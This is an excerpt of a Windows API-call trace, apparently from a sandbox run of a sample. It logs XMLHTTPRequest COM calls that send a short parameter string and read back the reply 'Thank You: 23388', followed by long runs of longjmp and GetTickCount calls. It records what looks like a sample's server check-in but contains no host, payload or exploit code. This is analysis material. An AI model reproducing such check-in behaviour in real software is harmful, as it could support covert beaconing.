	[0244.439] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0244.439] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0244.439] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0244.439] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0244.439] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0244.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0244.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0244.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0244.439] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0244.439] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0244.439] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0244.439] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0244.439] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0244.439] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0244.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0244.440] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0244.440] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0244.440] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0244.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0244.440] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0244.440] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0244.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0244.440] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0244.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0244.441] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5a52f98 | out: ppvObject=0x5a52f98*=0x0) returned 0x80004002
	[0244.441] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0244.442] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0244.442] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x115888 | out: ppvObject=0x115888*=0x0) returned 0x80004002
	[0244.442] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0254.532] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0254.532] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0254.532] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0254.532] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0254.532] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0254.532] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 23388", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0254.532] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0254.533] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0254.533] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0254.533] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0254.533] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0254.533] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0254.533] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0254.534] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0254.534] malloc (_Size=0xa8) returned 0x3de0b0
	[0254.536] GetTickCount () returned 0x11739a7
	[0254.537] GetTickCount () returned 0x11739a7
	[0254.537] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0254.537] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0254.537] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0254.537] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0254.537] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0254.537] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0254.538] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0254.538] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0254.538] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0254.541] longjmp () 
	[0254.541] longjmp () 
	[0254.541] longjmp () 
	[0254.541] GetCurrentThreadId () returned 0x9a8
	[0254.541] GetCurrentThreadId () returned 0x9a8
	[0254.542] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0254.542] malloc (_Size=0x80) returned 0x3c88b0
	[0254.542] longjmp () 
	[0254.542] longjmp () 
	[0254.542] longjmp () 
	[0254.542] longjmp () 
	[0254.542] longjmp () 
	[0254.543] longjmp () 
	[0254.543] longjmp () 
	[0254.543] longjmp () 
	[0254.543] longjmp () 
	[0254.544] longjmp () 
	[0254.544] longjmp () 
	[0254.544] longjmp () 
	[0254.544] longjmp () 
	[0254.544] longjmp () 
	[0254.545] longjmp () 
	[0254.545] longjmp () 
	[0254.545] longjmp () 
	[0254.545] GetTickCount () returned 0x11739a7
	[0254.545] longjmp () 
	[0254.546] longjmp () 
	[0254.546] longjmp () 
	[0254.546] longjmp () 
	[0254.546] longjmp () 
	[0254.547] longjmp () 
	[0254.547] longjmp () 
	[0254.547] longjmp () 
	[0254.547] longjmp () 
	[0254.547] longjmp () 
	[0254.548] longjmp () 
	[0254.548] longjmp () 
	[0254.548] longjmp () 
	[0254.548] longjmp () 
	[0254.548] longjmp () 
	[0254.549] longjmp () 
	[0254.549] longjmp () 
	[0254.549] longjmp () 
	[0254.549] longjmp () 
	[0254.550] longjmp () 
	[0254.550] longjmp () 
	[0254.550] longjmp () 
	[0254.550] longjmp () 
	[0254.550] longjmp () 
	[0254.551] longjmp () 
	[0254.551] longjmp () 
	[0254.551] longjmp () 
	[0254.551] longjmp () 
	[0254.552] longjmp () 
	[0254.552] longjmp () 
	[0254.552] longjmp () 
	[0254.552] longjmp () 
	[0254.552] GetTickCount () returned 0x11739b7
	[0254.552] longjmp () 
	[0254.553] longjmp () 
	[0254.553] longjmp () 
	[0254.553] longjmp () 
	[0254.553] longjmp () 
	[0254.554] longjmp () 
	[0254.554] longjmp () 
	[0254.554] longjmp () 
	[0254.554] longjmp () 
	[0254.555] longjmp () 
	[0254.555] longjmp () 
	[0254.555] longjmp () 
	[0254.555] longjmp () 
	[0254.555] longjmp () 
	[0254.556] longjmp () 
	[0254.556] longjmp () 
	[0254.556] longjmp () 
	[0254.556] longjmp () 
	[0254.556] longjmp () 
	[0254.557] longjmp () 
	[0254.557] longjmp () 
	[0254.557] longjmp () 
	[0254.557] longjmp () 
	[0254.557] longjmp () 
	[0254.558] longjmp () 
	[0254.558] longjmp () 
	[0254.558] longjmp () 
	[0254.558] longjmp () 
	[0254.559] longjmp () 
	[0254.559] longjmp () 
	[0254.559] longjmp () 
	[0254.559] longjmp () 
	[0254.560] GetTickCount () returned 0x11739b7
	[0254.560] longjmp () 
	[0254.560] longjmp () 
	[0254.560] longjmp () 
	[0254.560] longjmp () 
	[0254.561] longjmp () 
	[0254.561] longjmp () 
	[0254.561] longjmp () 
	[0254.561] longjmp () 
	[0254.562] longjmp () 
	[0254.562] longjmp () 
	[0254.562] longjmp () 
	[0254.562] longjmp () 
	[0254.562] longjmp () 
	[0254.563] longjmp () 
	[0254.563] longjmp () 
	[0254.563] longjmp () 
	[0254.563] longjmp () 
	[0254.564] longjmp () 
	[0254.564] longjmp () 
	[0254.564] longjmp () 
	[0254.564] longjmp () 
	[0254.565] longjmp () 
	[0254.565] longjmp () 
	[0254.565] longjmp () 
	[0254.565] longjmp () 
	[0254.565] longjmp () 
	[0254.566] longjmp () 
	[0254.566] longjmp () 
	[0254.566] longjmp () 
	[0254.566] longjmp () 
	[0254.566] longjmp () 
	[0254.567] longjmp () 
	[0254.567] GetTickCount () returned 0x11739c6
	[0254.567] longjmp () 
	[0254.567] longjmp () 
	[0254.567] longjmp () 
	[0254.568] longjmp () 
	[0254.568] longjmp () 
	[0254.568] longjmp () 
	[0254.568] longjmp () 
	[0254.568] longjmp () 
	[0254.569] longjmp () 
	[0254.569] longjmp () 
	[0254.569] longjmp () 
	[0254.569] longjmp () 
	[0254.570] longjmp () 
	[0254.570] longjmp () 
	[0254.570] longjmp () 
	[0254.570] longjmp () 
	[0254.570] longjmp () 
	[0254.570] longjmp () 
	[0254.570] longjmp () 
	[0254.571] longjmp () 
	[0254.571] longjmp () 
	[0254.571] longjmp () 
	[0254.571] longjmp () 
	[0254.571] longjmp () 
	[0254.572] longjmp () 
	[0254.572] longjmp () 
	[0254.572] longjmp () 
	[0254.572] longjmp () 
	[0254.573] longjmp () 
	[0254.573] longjmp () 
	[0254.573] longjmp () 
	[0254.573] longjmp () 
	[0254.573] GetTickCount () returned 0x11739c6
	[0254.574] longjmp () 
	[0254.574] longjmp () 
	[0254.574] longjmp () 
	[0254.574] longjmp () 
	[0254.574] longjmp () 
	[0254.575] longjmp () 
	[0254.575] longjmp () 
	[0254.575] longjmp () 
	[0254.575] longjmp () 
	[0254.575] longjmp () 
	[0254.576] longjmp () 
	[0254.576] longjmp () 
	[0254.576] longjmp () 
	[0254.576] longjmp () 
	[0254.576] longjmp () 
	[0254.576] longjmp () 
	[0254.577] longjmp () 
	[0254.577] longjmp () 
	[0254.577] longjmp () 
	[0254.577] longjmp () 
	[0254.578] longjmp () 
	[0254.578] longjmp () 
	[0254.578] longjmp () 
	[0254.578] longjmp () 
	[0254.578] longjmp () 
	[0254.579] longjmp () 
	[0254.579] longjmp () 
	[0254.579] longjmp () 
	[0254.579] longjmp () 
	[0254.579] longjmp () 
	[0254.580] longjmp () 
	[0254.580] longjmp () 
	[0254.580] GetTickCount () returned 0x11739d6
	[0254.580] longjmp () 
	[0254.580] longjmp () 
	[0254.581] longjmp () 
	[0254.581] longjmp () 
	[0254.581] longjmp () 
	[0254.581] longjmp () 
	[0254.581] longjmp () 
	[0254.582] longjmp () 
	[0254.582] longjmp () 
	[0254.582] longjmp () 
	[0254.582] longjmp () 
	[0254.582] longjmp () 
	[0254.583] longjmp () 
	[0254.583] longjmp () 
	[0254.583] longjmp () 
	[0254.583] longjmp () 
	[0254.584] longjmp () 
	[0254.584] longjmp () 
	[0254.584] longjmp () 
	[0254.584] longjmp () 
	[0254.585] longjmp () 
	[0254.585] longjmp () 
	[0254.585] longjmp () 
	[0254.585] longjmp () 
	[0254.585] longjmp () 
	[0254.586] longjmp () 
	[0254.586] longjmp () 
	[0254.586] longjmp () 
	[0254.586] longjmp () 
	[0254.587] longjmp () 
	[0254.587] longjmp () 
	[0254.587] longjmp () 
	[0254.587] GetTickCount () returned 0x11739d6
	[0254.587] longjmp () 
	[0254.588] longjmp () 
	[0254.588] longjmp () 
	[0254.588] longjmp () 
	[0254.588] longjmp () 
	[0254.588] longjmp () 
	[0254.589] longjmp () 
	[0254.589] longjmp () 
	[0254.589] longjmp () 
	[0254.589] longjmp () 
	[0254.589] longjmp () 
	[0254.590] longjmp () 
	[0254.590] longjmp () 
	[0254.590] longjmp () 
	[0254.590] longjmp () 
	[0254.590] longjmp () 
	[0254.591] longjmp () 
	[0254.591] longjmp () 
	[0254.591] longjmp () 
	[0254.591] longjmp () 
	[0254.592] longjmp () 
	[0254.592] longjmp () 
	[0254.592] longjmp () 
	[0254.592] longjmp () 
	[0254.592] longjmp () 
	[0254.594] longjmp () 
	[0254.594] longjmp () 
	[0254.594] longjmp () 
	[0254.594] longjmp () 
	[0254.594] longjmp () 
	[0254.595] longjmp () 
	[0254.595] longjmp () 
	[0254.595] GetTickCount () returned 0x11739e5
	[0254.595] longjmp () 
	[0254.595] longjmp () 
	[0254.596] longjmp () 
	[0254.596] longjmp () 
	[0254.596] longjmp () 
	[0254.596] longjmp () 
	[0254.596] longjmp () 
	[0254.596] longjmp () 
	[0254.597] longjmp () 
	[0254.597] longjmp () 
	[0254.597] longjmp () 
	[0254.597] longjmp () 
	[0254.598] longjmp () 
	[0254.598] longjmp () 
	[0254.598] longjmp () 
	[0254.598] longjmp () 
	[0254.599] longjmp () 
	[0254.599] longjmp () 
	[0254.599] longjmp () 
	[0254.599] longjmp () 
	[0254.599] longjmp () 
	[0254.600] longjmp () 
	[0254.600] longjmp () 
	[0254.600] longjmp () 
	[0254.600] longjmp () 
	[0254.600] longjmp () 
	[0254.601] longjmp () 
	[0254.601] longjmp () 
	[0254.601] longjmp () 
	[0254.601] longjmp () 
	[0254.602] longjmp () 
	[0254.602] longjmp () 
	[0254.602] GetTickCount () returned 0x11739e5
	[0254.602] longjmp () 
	[0254.602] longjmp () 
	[0254.602] longjmp () 
	[0254.603] longjmp () 
	[0254.603] longjmp () 
	[0254.603] longjmp () 
